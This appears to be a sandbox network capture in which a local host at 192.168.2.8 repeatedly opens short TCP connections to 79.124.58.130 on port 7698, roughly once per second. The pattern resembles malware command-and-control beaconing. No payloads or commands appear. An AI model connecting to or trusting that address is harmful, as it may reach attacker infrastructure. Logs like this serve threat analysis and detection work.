Oct 23, 2024 17:26:04.014286041 CEST	7698	49734	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:04.894721985 CEST	7698	49734	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:04.894870996 CEST	49734	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:05.002545118 CEST	49734	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:05.002892017 CEST	49735	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:05.009000063 CEST	7698	49735	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:05.009130001 CEST	49735	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:05.009212017 CEST	49735	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:05.009258032 CEST	7698	49734	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:05.009311914 CEST	49734	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:05.014511108 CEST	7698	49735	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:05.900727034 CEST	7698	49735	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:05.900810003 CEST	49735	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:06.018177986 CEST	49735	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:06.018574953 CEST	49736	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:06.024312019 CEST	7698	49736	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:06.024425030 CEST	49736	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:06.024585962 CEST	7698	49735	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:06.024596930 CEST	49736	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:06.024637938 CEST	49735	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:06.030241013 CEST	7698	49736	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:06.911962032 CEST	7698	49736	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:06.912017107 CEST	49736	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:07.018158913 CEST	49736	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:07.018501043 CEST	49737	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:07.023972988 CEST	7698	49736	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:07.024069071 CEST	49736	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:07.024071932 CEST	7698	49737	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:07.024141073 CEST	49737	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:07.024276972 CEST	49737	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:07.029778957 CEST	7698	49737	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:08.179464102 CEST	7698	49737	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:08.179502010 CEST	7698	49737	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:08.179523945 CEST	49737	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:08.179560900 CEST	49737	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:08.179933071 CEST	49737	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:08.185234070 CEST	7698	49737	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:08.300124884 CEST	49738	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:08.305632114 CEST	7698	49738	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:08.305758953 CEST	49738	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:08.306018114 CEST	49738	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:08.311827898 CEST	7698	49738	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:09.247842073 CEST	7698	49738	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:09.248116016 CEST	49738	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:09.338347912 CEST	7698	49738	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:09.338427067 CEST	49738	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:09.361990929 CEST	49738	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:09.362452984 CEST	49739	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:09.367412090 CEST	7698	49738	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:09.367840052 CEST	7698	49739	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:09.367917061 CEST	49739	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:09.368122101 CEST	49739	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:09.373469114 CEST	7698	49739	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:10.255693913 CEST	7698	49739	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:10.255789995 CEST	49739	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:10.402106047 CEST	7698	49739	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:10.402237892 CEST	49739	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:10.428833961 CEST	49739	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:10.429754972 CEST	49740	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:10.434123993 CEST	7698	49739	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:10.435053110 CEST	7698	49740	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:10.435122013 CEST	49740	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:10.452840090 CEST	49740	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:10.458287954 CEST	7698	49740	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:11.324069023 CEST	7698	49740	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:11.324203968 CEST	49740	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:11.450295925 CEST	49740	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:11.450650930 CEST	49741	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:11.456072092 CEST	7698	49741	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:11.456171036 CEST	49741	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:11.456300974 CEST	49741	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:11.456327915 CEST	7698	49740	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:11.456422091 CEST	49740	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:11.462007046 CEST	7698	49741	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:12.358958960 CEST	7698	49741	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:12.359041929 CEST	49741	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:12.471280098 CEST	49741	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:12.471944094 CEST	49742	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:12.477360010 CEST	7698	49741	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:12.477442026 CEST	7698	49742	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:12.477442980 CEST	49741	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:12.477616072 CEST	49742	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:12.484675884 CEST	49742	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:12.490854979 CEST	7698	49742	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:13.360125065 CEST	7698	49742	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:13.360299110 CEST	49742	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:13.471260071 CEST	49742	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:13.471592903 CEST	49743	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:13.476994038 CEST	7698	49743	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:13.477020979 CEST	7698	49742	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:13.477082014 CEST	49743	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:13.477109909 CEST	49742	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:13.477315903 CEST	49743	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:13.482675076 CEST	7698	49743	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:14.356265068 CEST	7698	49743	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:14.356396914 CEST	49743	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:14.471309900 CEST	49743	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:14.471615076 CEST	49744	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:14.476979017 CEST	7698	49744	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:14.477024078 CEST	7698	49743	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:14.477073908 CEST	49744	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:14.477097034 CEST	49743	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:14.477349997 CEST	49744	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:14.482680082 CEST	7698	49744	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:15.357425928 CEST	7698	49744	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:15.357630014 CEST	49744	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:15.505275011 CEST	7698	49744	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:15.505363941 CEST	49744	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:15.586436033 CEST	49744	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:15.587073088 CEST	49745	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:15.592236042 CEST	7698	49744	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:15.592474937 CEST	7698	49745	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:15.592546940 CEST	49745	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:15.602524042 CEST	49745	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:15.607866049 CEST	7698	49745	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:16.494213104 CEST	7698	49745	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:16.494345903 CEST	49745	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:16.612267971 CEST	49745	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:16.613164902 CEST	49746	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:16.618257999 CEST	7698	49745	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:16.618352890 CEST	49745	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:16.618541956 CEST	7698	49746	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:16.618617058 CEST	49746	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:16.622534990 CEST	49746	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:16.628102064 CEST	7698	49746	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:17.505584955 CEST	7698	49746	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:17.505655050 CEST	49746	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:17.628026009 CEST	49746	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:17.628648043 CEST	49747	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:17.634140968 CEST	7698	49747	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:17.634258986 CEST	49747	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:17.634488106 CEST	49747	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:17.634495020 CEST	7698	49746	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:17.634548903 CEST	49746	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:17.640100002 CEST	7698	49747	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:18.522517920 CEST	7698	49747	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:18.522595882 CEST	49747	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:18.668603897 CEST	7698	49747	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:18.668798923 CEST	49747	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:18.672944069 CEST	49747	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:18.673288107 CEST	49748	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:18.678287029 CEST	7698	49747	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:18.678932905 CEST	7698	49748	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:18.679014921 CEST	49748	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:18.711203098 CEST	49748	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:18.716660023 CEST	7698	49748	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:19.570184946 CEST	7698	49748	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:19.570341110 CEST	49748	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:19.690186024 CEST	49748	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:19.690536022 CEST	49749	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:19.696001053 CEST	7698	49749	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:19.696074963 CEST	49749	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:19.696093082 CEST	7698	49748	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:19.696140051 CEST	49748	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:19.696365118 CEST	49749	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:19.701682091 CEST	7698	49749	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:20.597740889 CEST	7698	49749	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:20.597841978 CEST	49749	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:20.706008911 CEST	49749	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:20.706352949 CEST	49750	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:20.711896896 CEST	7698	49749	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:20.712014914 CEST	7698	49750	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:20.712033987 CEST	49749	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:20.712097883 CEST	49750	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:20.712317944 CEST	49750	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:20.717762947 CEST	7698	49750	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:21.601063013 CEST	7698	49750	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:21.602498055 CEST	49750	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:21.736903906 CEST	49750	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:21.737293005 CEST	49751	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:21.742801905 CEST	7698	49751	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:21.742993116 CEST	7698	49750	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:21.743091106 CEST	49750	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:21.743105888 CEST	49751	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:21.743232965 CEST	49751	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:21.748677969 CEST	7698	49751	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:22.639131069 CEST	7698	49751	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:22.639246941 CEST	49751	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:22.752460003 CEST	49751	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:22.752749920 CEST	49752	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:22.759058952 CEST	7698	49752	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:22.759160995 CEST	49752	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:22.759289980 CEST	49752	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:22.761949062 CEST	7698	49751	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:22.762061119 CEST	49751	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:22.765041113 CEST	7698	49752	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:23.660198927 CEST	7698	49752	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:23.660331964 CEST	49752	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:23.786230087 CEST	49752	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:23.786578894 CEST	49753	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:23.792195082 CEST	7698	49752	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:23.792284012 CEST	49752	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:23.792365074 CEST	7698	49753	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:23.792434931 CEST	49753	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:23.792592049 CEST	49753	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:23.797976971 CEST	7698	49753	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:24.693700075 CEST	7698	49753	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:24.693927050 CEST	49753	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:24.799345970 CEST	49753	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:24.799702883 CEST	49754	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:24.805356979 CEST	7698	49754	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:24.805494070 CEST	49754	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:24.805612087 CEST	49754	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:24.806090117 CEST	7698	49753	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:24.806148052 CEST	49753	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:24.811029911 CEST	7698	49754	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:25.699343920 CEST	7698	49754	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:25.699415922 CEST	49754	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:25.815145016 CEST	49754	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:25.815587997 CEST	49755	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:25.822062016 CEST	7698	49754	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:25.822143078 CEST	49754	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:25.822675943 CEST	7698	49755	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:25.822756052 CEST	49755	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:25.822983980 CEST	49755	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:25.829632998 CEST	7698	49755	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:26.710427046 CEST	7698	49755	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:26.710638046 CEST	49755	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:26.815193892 CEST	49755	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:26.815589905 CEST	49756	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:26.821149111 CEST	7698	49756	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:26.821214914 CEST	49756	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:26.821247101 CEST	7698	49755	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:26.821288109 CEST	49755	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:26.821470976 CEST	49756	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:26.826917887 CEST	7698	49756	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:27.702272892 CEST	7698	49756	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:27.702428102 CEST	49756	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:27.816118002 CEST	49756	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:27.816493988 CEST	49757	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:27.822891951 CEST	7698	49757	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:27.822969913 CEST	49757	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:27.823152065 CEST	49757	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:27.823411942 CEST	7698	49756	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:27.823461056 CEST	49756	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:27.828871965 CEST	7698	49757	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:28.721196890 CEST	7698	49757	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:28.721261024 CEST	49757	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:28.830760002 CEST	49757	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:28.831088066 CEST	49759	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:28.836510897 CEST	7698	49759	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:28.836632967 CEST	49759	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:28.836760998 CEST	49759	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:28.837184906 CEST	7698	49757	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:28.837239981 CEST	49757	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:28.842241049 CEST	7698	49759	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:29.741741896 CEST	7698	49759	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:29.741852999 CEST	49759	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:29.861989975 CEST	49759	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:29.862314939 CEST	49760	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:29.867758989 CEST	7698	49759	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:29.867810011 CEST	49759	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:29.867947102 CEST	7698	49760	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:29.868004084 CEST	49760	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:29.868125916 CEST	49760	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:29.873652935 CEST	7698	49760	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:30.754081011 CEST	7698	49760	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:30.755424976 CEST	49760	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:30.877657890 CEST	49760	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:30.877954006 CEST	49761	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:30.883326054 CEST	7698	49761	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:30.883346081 CEST	7698	49760	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:30.883419037 CEST	49761	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:30.883574009 CEST	49761	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:30.883780003 CEST	49760	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:30.888936043 CEST	7698	49761	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:31.769042015 CEST	7698	49761	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:31.769138098 CEST	49761	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:31.877762079 CEST	49761	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:31.877999067 CEST	49762	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:31.883469105 CEST	7698	49762	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:31.883575916 CEST	49762	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:31.883672953 CEST	49762	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:31.883977890 CEST	7698	49761	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:31.884037971 CEST	49761	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:31.889194965 CEST	7698	49762	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:32.781876087 CEST	7698	49762	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:32.782094002 CEST	49762	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:32.893589973 CEST	49762	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:32.894109964 CEST	49763	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:32.899581909 CEST	7698	49762	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:32.899595976 CEST	7698	49763	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:32.899785042 CEST	49763	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:32.899822950 CEST	49762	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:32.900111914 CEST	49763	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:32.905359030 CEST	7698	49763	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:33.797327995 CEST	7698	49763	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:33.797480106 CEST	49763	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:33.909122944 CEST	49763	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:33.909440994 CEST	49764	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:33.915134907 CEST	7698	49763	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:33.915211916 CEST	49763	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:33.915540934 CEST	7698	49764	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:33.915606022 CEST	49764	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:33.915798903 CEST	49764	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:33.921130896 CEST	7698	49764	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:34.808461905 CEST	7698	49764	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:34.808583975 CEST	49764	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:34.924518108 CEST	49764	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:34.924792051 CEST	49765	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:34.930150986 CEST	7698	49765	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:34.930304050 CEST	49765	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:34.930434942 CEST	7698	49764	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:34.930520058 CEST	49764	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:34.930625916 CEST	49765	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:34.936002016 CEST	7698	49765	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:36.383127928 CEST	7698	49765	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:36.383212090 CEST	7698	49765	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:36.383218050 CEST	49765	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:36.383276939 CEST	49765	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:36.383285046 CEST	7698	49765	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:36.383341074 CEST	49765	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:36.383399963 CEST	7698	49765	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:36.383444071 CEST	49765	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:36.383444071 CEST	49765	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:36.389132023 CEST	7698	49765	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:36.489969015 CEST	49766	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:36.495816946 CEST	7698	49766	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:36.495906115 CEST	49766	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:36.496062040 CEST	49766	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:36.502260923 CEST	7698	49766	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:37.398982048 CEST	7698	49766	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:37.399086952 CEST	49766	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:37.518086910 CEST	49766	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:37.518521070 CEST	49767	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:37.524034023 CEST	7698	49767	79.124.58.130	192.168.2.8
